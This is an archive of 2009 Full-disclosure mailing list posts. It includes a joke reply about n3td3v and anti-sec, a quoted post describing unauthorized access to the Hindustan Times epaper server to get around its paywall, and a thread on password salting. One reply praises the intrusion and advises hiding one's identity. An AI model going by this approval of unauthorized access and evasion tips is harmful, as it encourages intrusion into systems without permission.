n3td3v, ureleet, and anti-sec are actually all Hitler, posting after
being recently unfrozen from cryogenic sleep. He is using this as part
of his black magic scheme to bring back nazi occultism and rule the
world once again.

Careful review of all posts shows the superstructure of a subconscious
mind-virus, waiting for a trigger event deep in the recesses of our
collective minds.

When you want to go to it
Relax don't do it
When you want to come

-Travis

On Sun, Aug 9, 2009 at 12:20 AM,  wrote:
> n3td3v is our exploit coder. pheer infidelz.
>
> On Sat, 08 Aug 2009 19:31:26 -0400 someone lawyer
>  wrote:
>>List,
>>
>>Ureleet is the Anti-Sec he been trying to slander n3td3v
>>(legitimate
>>security researcher) the whole time.
>>
>>some...@lawyer.com
>>


Re: [Full-disclosure] Hindustan Times epaper Server Hacked

2009-08-10 Thread T Biehn
While your publications are slightly pretentious (who am I to talk?) I
applaud your idealism in an age of rampant cynicism.

Don't log into any US Government systems looking to liberate secret
UFO docs tho, that gets you extradited.

A small suggestion, do not use a consistent pseudonym, post completely
anonymously. It's difficult to keep the ego from making mistakes.

-Travis

On Sun, Aug 9, 2009 at 1:56 AM, Sky wrote:
> Hindustan Times epaper Server Hacked
> http://sky.net.in/hindustan-times-epaper-server-hacked/
>
> Hindustan Times (HT) is India’s leading newspaper, published since 1924 with
> roots in the independence movement. In 2008, the newspaper reported that
> with a (circulation of over 1.14 million) ranking them as the third largest
> circulatory daily English Newspaper in India. The Mumbai edition was
> launched on 14 July 2005. HT has a readership of (6.6 million) ranking them
> as the second most widely read English Newspaper after Times of India.
> (Source: Wikipedia article on Hindustan Times) -
> http://en.wikipedia.org/wiki/Hindustan_Times
>
> HindustanTimes + Hindustan epaper Server Hacked
> http://lh4.ggpht.com/_gbWPSul_tCM/Sn5UNhLLVYI/ASM/JY9bc67HV14/s800/hindustan_times_hacked.jpg
>
> Why was Hindustan Times (HT) epaper Server Hacked ?
>
> Many people think that Hindustan Times (HT) (English Edition) + Hindustan
> (Hindi Edition) is available on the internet free of cost, HT Media has made
> it compulsory to register on their website in order to read the daily online
> edition of their published newspapers, on completion of registration HT
> Media provides you instant access to read daily edition, the CATCH is – you
> can only read the daily edition + past seven days editions (from the current
> date) as a free user, whereas if you wanna read any edition beyond seven
> days, you will have to pay a huge (rip off) amount to HT Media (in the name
> of digital archive subscription)
>
>
> Registration Information Collected by HindustanTimes
> http://lh6.ggpht.com/_gbWPSul_tCM/Sn5WIrsZxcI/ASs/Lc6NaQzxEfk/s800/HT_registration.jpg
>
> Free HindustanTimes Editions
> http://lh6.ggpht.com/_gbWPSul_tCM/Sn5UN35Yx5I/ASU/6THfLaMu00M/s800/HT_free_editions.jpg
>
> Restricted Access to HindustanTimes epaper Archives
> http://lh4.ggpht.com/_gbWPSul_tCM/Sn5UN5umsJI/ASY/5_SfNzOEm7w/s800/HT_newspaper_subscribe.jpg
>
> Archive Subscription Charges for HindustanTimes is a total Rip Off
> http://lh4.ggpht.com/_gbWPSul_tCM/Sn5ViIwx2aI/ASo/6TMgKDuc6Vg/s800/HT_archive_charges.jpg
>
>
> As a hacker, i think its not fair (for anyone) to loot common people and
> sell (publicly gained) information in such a way, so i decided to peek
> inside the server and find some bugs / architectural flaws which would allow
> me to access past newspaper (Images / PDF) editions for free
>
> Within a couple of hours, i managed to find some bugs / architectural flaws
> (& vulnerabilities) which gave out free access to the past (Images / PDF)
> newspaper editions
>
> Calvin and Hobbes publishing error
>
> I used to search the newspaper (HT hard copy) every morning for technology
> related news (hoping any Indian journalist must have written some piece)
> that went on for like weeks and then i started reading Calvin and Hobbes
> (the comic strip) every day published in HT Cafe
>
> On 2nd / 4th / 9th June, Hindustan Times (HT) published the same Calvin and
> Hobbes strip, how should i react against this publishing error by Hindustan
> Times, as a fan of Calvin and Hobbes, i expect new comic strip every day
>
> Checkout the exact same Calvin and Hobbes strip published thrice on various
> days in the single month of June (2009)
>
>     2nd June
>
> http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/02/538/02_06_2009_538_013.jpg
>
>     9th June
>
> http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/09/538/09_06_2009_538_002.jpg
>
>     4th June
>
> http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/04/538/04_06_2009_538_006.jpg
>
> Informing the privileged authorities
>
> On 10th July 2009, i informed the editor and other top most authorities @
> HindustanTimes via email regarding the serious bugs / flaws (&
> vulnerabilities) on their ePaper Server which can be exploited to compromise
> data and cause financial losses for HT Media
>
> My email to HindustanTimes
> http://lh5.ggpht.com/_gbWPSul_tCM/Sn5WJt3UKGI/AS0/KOnhjTtBNnk/s800/my_email_hindustan_times.jpg
>
> Rashmi Chugh's reply to me
> http://lh4.ggpht.com/_gbWPSul_tCM/Sn5W9mSD0pI/ATI/O5hazb5IIY4/s800/rashmi_livemint_reply.jpg
>
> Although i received a reply from Rashmi Chugh (Business Head and Publisher,
> LIVEMINT) within 3 minutes, i waited for 24 hours to receive other
> recipients reply (as i wanted to know what they thought about the issue) but
> sadly no one replied back except Rashmi Chugh, so i sent her a reply the
> other day
>
> My reply to Rashmi Chugh, LIVEMINT
> http://lh3.ggpht.c

Re: [Full-disclosure] Salted passwords

2009-08-10 Thread T Biehn
Richard,
The approach I outline in my post is the correct one, that is, making
it computationally expensive to crack. I'm not trying to protect
passwords, think anonymizing account numbers and the like.. That is,
the possible combinations are a set that is unacceptably small.
Without an expensive compute step it's trivial to brute force given a
static salt location...

(excuse my use of shitty pseudocode, assume homogeneous length 10)

Typically the test is:

if storedHash = hashFcn(userPassword & storedSalt) //9,999,999,999 tests

if you randomly store the storedSalt ANYWHERE within userPassword, it becomes

for (int i=0; i wrote:
**REDACTED**
"explain please"
**REDACTED**



[Full-disclosure] Salted passwords

2009-08-09 Thread T Biehn
Soliciting random suggestions.
Let's say I have data to one-way-hash.
The set has 9,999,999,999 members.
It's relatively easy to brute force this, or create precomp tables.
So you add a salt to each.
Still easy to brute force.
If you were to create it in such a way that the hash could exist
anywhere in the set member, does this increase the cost of computation
enough?

That is, consider a member 'abcdefg' with salt 329938255.
When authenticating against the server, it must permute over all
possible combinations of the salt and the set member in order to
determine the validity of the password.

If anyone has a better approach, or would like to approach me off
list, or knows of a list more suited to these queries please feel free
to redirect me :)

-Travis


